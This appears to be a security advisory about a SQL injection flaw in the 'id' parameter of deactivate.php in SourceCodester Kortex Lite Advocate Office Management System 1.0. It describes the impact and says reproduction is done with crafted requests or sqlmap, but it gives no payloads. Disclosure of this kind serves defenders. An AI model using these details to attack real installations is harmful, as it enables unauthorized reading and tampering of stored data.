SourceCodester Kortex Lite Advocate Office Management System SQL Injection Vulnerability in deactivate.php

A critical SQL injection vulnerability has been identified in SourceCodester Kortex Lite Advocate Office Management System version 1.0. The issue arises in the deactivate.php file, specifically within the processing of the 'id' parameter. This vulnerability allows for the injection of malicious SQL queries, which could be used to access and extract sensitive information from the database. The vulnerability can be exploited remotely, and details of the exploit have been disclosed publicly.

Impact

Exploitation of this vulnerability allows attackers to inject SQL queries that could be executed by the database. This could lead to unauthorized access to the database, allowing attackers to read, modify, or delete data. If the database user has elevated privileges, such as DBA rights, it could potentially lead to gaining control over the server hosting the database.

Reproduction

The vulnerability can be reproduced by sending a crafted HTTP request to the deactivate.php file with a malicious payload in the 'id' parameter. This can be done using tools like sqlmap, which automates the process of finding and exploiting SQL injection vulnerabilities. The injected SQL payloads can be designed to extract database information, demonstrating the vulnerability's impact.